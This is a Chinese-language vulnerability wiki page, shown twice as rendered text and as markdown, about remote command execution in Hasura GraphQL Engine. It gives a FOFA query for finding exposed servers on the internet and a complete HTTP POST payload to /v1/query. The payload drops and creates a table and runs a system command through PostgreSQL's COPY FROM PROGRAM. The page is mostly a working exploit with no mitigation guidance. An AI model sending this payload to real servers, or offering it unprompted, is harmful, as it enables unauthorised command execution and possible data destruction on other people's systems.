fofamini-wiki

登录白背景

源码

Hasura GraphQL Engine 远程命令执行漏洞

一、漏洞简介

Hasura GraphQL Engine是Hasura开源的一个非常快速的 GraphQL 服务器。Hasura GraphQL Engine 存在远程命令执行漏洞。

二、影响版本

Hasura GraphQL Engine

三、资产测绘

fofa"Hasura GraphQL"
特征

四、漏洞复现

POST /v1/query HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 352
Content-Type: application/x-www-form-urlencoded

{"type": "bulk", "args": [{"type": "run_sql", "args": {"sql": "SET LOCAL statement_timeout = 10000;", "cascade": false, "read_only": false}}, {"type": "run_sql", "args": {"sql": "DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM 'id';\nSELECT * FROM cmd_exec;", "cascade": false, "read_only": false}}]}

原文: https://www.yuque.com/xiaokp7/ocvun2/slat7zhe9q9wkpod

# Hasura GraphQL Engine 远程命令执行漏洞

# 一、漏洞简介
Hasura GraphQL Engine是Hasura开源的一个非常快速的 GraphQL 服务器。Hasura GraphQL Engine 存在远程命令执行漏洞。

# 二、影响版本

- Hasura GraphQL Engine

# 三、资产测绘

- fofa`"Hasura GraphQL"`
- 特征

![image.png](./img/4KC0MPX5CIyLrEZO/1694793099202-bbf5cfa9-ee06-4098-b840-b7a30bb0a2ca-794514.png)

# 四、漏洞复现
```java
POST /v1/query HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 352
Content-Type: application/x-www-form-urlencoded

{"type": "bulk", "args": [{"type": "run_sql", "args": {"sql": "SET LOCAL statement_timeout = 10000;", "cascade": false, "read_only": false}}, {"type": "run_sql", "args": {"sql": "DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM 'id';\nSELECT * FROM cmd_exec;", "cascade": false, "read_only": false}}]}
```
![image.png](./img/4KC0MPX5CIyLrEZO/1694793143374-4f105664-2978-44eb-9bbb-6c71e2e29d10-280317.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/slat7zhe9q9wkpod>